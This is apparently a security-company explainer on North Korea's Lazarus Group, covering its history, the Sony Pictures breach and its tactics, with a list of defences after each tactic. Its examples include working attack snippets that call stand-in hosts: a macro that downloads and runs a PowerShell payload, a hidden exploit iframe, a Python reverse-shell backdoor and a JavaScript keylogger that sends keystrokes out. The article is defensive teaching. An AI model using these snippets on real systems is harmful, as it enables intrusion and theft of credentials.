Lazarus Group: cyber threat from North Korea 

Table of contents

• Who is the Lazarus Group? 
• The attack on Sony Pictures: a turning point
• How the Lazarus Group attacks 
• Beyond Sony: the Lazarus Group’s other global attacks
• Lazarus Group and mobile device threats 
• Defending against the Lazarus Group 

The Lazarus APT Group is one of the most feared threat actors in the world of cyber security. Believed to be linked to North Korea, this group has been responsible for some of the most devastating cyberattacks in history, including the infamous 2014 Sony Pictures Entertainment hack.

Their operations extend across financial institutions, cryptocurrency exchanges, and even government agencies, using highly sophisticated malware and attack techniques. 

This article delves into who the Lazarus Group is, their most notorious attacks, and how organizations can defend against their threats. 

Who is the Lazarus Group? 

The Lazarus Group is a cybercriminal organization with alleged ties to the North Korean government. Active since at least 2009, this APT (Advanced Persistent Threat) group has launched attacks on financial institutions, media companies, and even national infrastructure across multiple continents. 

Cyber security firms and intelligence agencies believe that Lazarus utilizes cyberattacks to fund the regime in Pyongyang, bypassing international sanctions. Their methods include stealing from cryptocurrency exchanges, hacking banks, and even engaging in cyber espionage. 

The group’s operations became widely known through the Operation Blockbuster, a joint investigation that exposed their cyberattacks across 14 countries, including the United States, South Korea, and India. 

The attack on Sony Pictures: a turning point

One of the most high-profile attacks linked to the Lazarus APT was the Sony Pictures Entertainment breach in November 2014. The attackers infiltrated the company’s network, stealing 2 terabytes of sensitive data, including emails, contracts, salaries, and even unreleased movies. 

The hack was allegedly retaliation for The Interview, a satirical movie mocking Kim Jong-un. The FBI quickly traced the attack to North Korea’s Lazarus Group, identifying malware code similarities with previous attacks. 

The attack caused massive financial and reputational damage to Sony, forcing companies worldwide to rethink their cyber security strategies. 

How the Lazarus Group attacks 

The Lazarus APT Group employs a combination of social engineering, software vulnerabilities, and advanced attack techniques to infiltrate systems and steal data. Their targets often include financial institutions, cryptocurrency exchanges, critical infrastructure, and technology companies. 

Let’s explore some of the main tactics used by the Lazarus Group, with practical examples and code snippets where applicable. 

Spear phishing: deceptive email attacks 

The Lazarus APT Group frequently uses spear phishing attacks, sending targeted emails to employees with the goal of stealing credentials or distributing malware. 

Attack example
An employee receives an email that appears to be from a trusted colleague or vendor. The email contains an attachment or a link to an online document which, once opened, executes malicious code on the victim’s computer. 

Code example: macro malware in a word document 

Lazarus often uses Office documents with malicious macros to execute malware. Here’s an example of a VBA macrothat downloads and executes a PowerShell script from a remote server: 

vba 

Sub AutoOpen() 

    Dim objShell As Object 

    Set objShell = CreateObject("WScript.Shell") 

    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')"""

End Sub
 

This macro runs automatically when the document is opened and downloads a PowerShell payload from a remote server, allowing hackers to gain control of the system.

Mitigation

• Disable macros by default and only allow signed macros. 

• Implement Multi-Factor Authentication (MFA) to protect accounts. 

• Use email security filters to detect and block phishing attempts. 

Zero-day exploits: attacking unknown vulnerabilities 

The Lazarus Group is known for leveraging zero-day vulnerabilities, security flaws unknown to software vendors. 

Attack example 
In 2021, Lazarus exploited a zero-day vulnerability in Internet Explorer (CVE-2021-26411) to compromise users who visited infected websites. 

Code example: JavaScript exploit for web attacks 

Attackers can inject malicious code into a website, forcing visitors’ browsers to execute an exploit: 

javascript 

window.onload = function() { 

    var iframe = document.createElement('iframe'); 

    iframe.src = "http://malicious-site.com/exploit.html"; 

    iframe.style.display = "none"; 

    document.body.appendChild(iframe); 

};

This script loads a hidden iframe pointing to a malicious page that executes an exploit against the victim’s browser. 

Mitigation

• Keep software and operating systems updated to patch vulnerabilities. 

• Use advanced endpoint protection that detects and blocks exploit attempts. 

• Isolate high-risk environments using sandboxing and virtual machines. 

Custom malware: trojans and backdoors 

The Lazarus Group develops custom malware to steal sensitive information and maintain long-term access to compromised networks. 

Attack example
In 2017, FALLCHILL malware, linked to Lazarus, was used to gain remote access to corporate networks. Once installed, it allowed attackers to execute commands and transfer files remotely. 

Code example: python backdoor 

Here’s an example of a simple python backdoor that connects to a hacker-controlled server and executes remote commands: 

python 

import socket 

import subprocess 

HOST = "attacker.com" 

PORT = 4444 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect((HOST, PORT)) 

while True: 

    command = s.recv(1024).decode() 

    if command.lower() == "exit": 

        break 

    output = subprocess.getoutput(command) 

    s.send(output.encode()) 

s.close()

This backdoor enables an attacker to execute commands on the compromised system in real time. 

Mitigation

• Deploy Intrusion Detection Systems (IDS) to monitor and block suspicious traffic. 

• Analyze running processes to detect unauthorized access. 

• Restrict outbound network connections to prevent malware from communicating with command-and-control servers. 

Watering hole attacks: infecting trusted websites 

Watering hole attacks involve infecting legitimate websites frequently visited by targeted individuals, allowing malware to be silently installed on their devices. 

Attack example
In 2019, Lazarus compromised defense-related websites to infect the devices of government employees. 

Code example: malicious JavaScript injection 

Attackers modify legitimate websites to include JavaScript that redirects victims to a malicious page: 

html 

<script src="http://malicious-site.com/malware.js"></script> 

Alternatively, they can log keystrokes using a keylogger in JavaScript: 

javascript 

document.addEventListener('keydown', function(event) { 

    fetch('http://malicious-site.com/steal', { 

        method: 'POST', 

        body: JSON.stringify({ key: event.key }) 

    }); 

});

Mitigation

• Use browser security extensions like NoScript to block unauthorized scripts. 

• Monitor DNS traffic for connections to malicious domains. 

• Avoid entering credentials on untrusted websites. 

Attacking personal devices and BYOD policies 

The Lazarus Group targets smartphones and personal laptops used for work, especially when companies allow BYOD (Bring Your Own Device) policies without proper security controls. 

Attack example
An employee downloads a fake mobile app from an unofficial store. The app contains malware that steals corporate data, including emails and login credentials. 

Mitigation

• Implement Mobile Device Management (MDM) solutions to enforce security policies. 

• Avoid downloading apps from untrusted sources. 

• Use corporate VPNs to secure communications. 

Beyond Sony: the Lazarus Group’s other global attacks

The Lazarus Group’s activities extend far beyond Sony Pictures. The group has been linked to several major cyber incidents, including: 

• DarkSeoul attacks (2013)
  Disrupting South Korean media and banking institutions. 

• Bangladesh bank heist (2016)
  Stealing $81 million via the SWIFT banking system. 

• WannaCry ransomware (2017)
  A global ransomware attack that crippled hospitals and businesses. 

• Ongoing cryptocurrency heists
  Targeting cryptocurrency exchanges to steal digital assets. 

Each attack showcases Lazarus Group’s evolving tactics and their ability to bypass traditional IT security measures. 

Lazarus Group and mobile device threats 

With more businesses embracing BYOD policies, organizations must understand how personal devices With the spread of BYOD policies, it is essential to understand how personal devices can be vulnerable to Lazarus Group attacks. Hackers exploit methods such as:

• Infected apps that steal corporate data.
• Phishing links that compromise phones.
• Exploits against insecure mobile device management (MDM) solutions.

Companies must implement advanced MDM solutions to protect devices and prevent unauthorized access.

Defending against the Lazarus Group 

Despite their sophistication, risks can be mitigated by adopting appropriate security strategies:

• Advanced threat detection to identify unusual network activity. 

• Regular employee training on phishing and social engineering risks. 

• Multi-layered authentication to prevent unauthorized access. 

• Strict BYOD policies with secure mobile device management (MDM) solutions. 

Cyber security teams must remain vigilant, as North Korea’s Lazarus Group continues to evolve, adapting to new security defenses. 

Conclusion 

The Lazarus Group represents one of the most dangerous cyber threats today. With a history of financial crimes, data breaches, and cyber espionage, their operations have impacted businesses and governments worldwide.

Understanding their tactics is critical to improving cyber defenses and protecting data and infrastructure from these malicious actors.

Questions and answers

1. Who is the Lazarus Group? 
   The Lazarus Group is a cybercriminal organization believed to be backed by North Korea, responsible for major cyberattacks worldwide. 
2. What was Operation Blockbuster? 
   Operation Blockbuster was a joint investigation that exposed the Lazarus APT Group’s global cyber activities, linking them to numerous financial and espionage attacks. 
3. Why did Lazarus Group attack Sony Pictures? 
   The attack on Sony Pictures was allegedly in retaliation for The Interview, a film mocking Kim Jong-un. The breach resulted in massive data leaks and financial damage. 
4. What are Lazarus Group’s main targets? 
   They typically target financial institutions, cryptocurrency exchanges, government agencies, and large corporations to steal money and information. 
5. How does Lazarus Group steal cryptocurrency? 
   They use phishing attacks, malicious apps, and software vulnerabilities to gain access to cryptocurrency exchanges and wallets. 
6. What is the link between Lazarus and WannaCry ransomware? 
   The WannaCry ransomware attack in 2017 was attributed to Lazarus APT, leveraging a leaked NSA exploit to spread the malware globally. 
7. How does Lazarus exploit BYOD policies? 
   They target personal devices used for work, exploiting weaknesses in MDM solutions and unsecured mobile device management setups. 
8. Can Lazarus attack individuals? 
   Yes, individuals can be targeted through phishing scams, malicious downloads, and compromised networks. 
9. How can companies defend against Lazarus attacks? 
   Implementing advanced threat detection, employee training, and secure mobile management (MDM) are key steps to mitigating risks. 
10. Is the Lazarus Group still active? 
    Yes, the Lazarus Group remains a major cyber threat, constantly adapting and launching new attacks worldwide.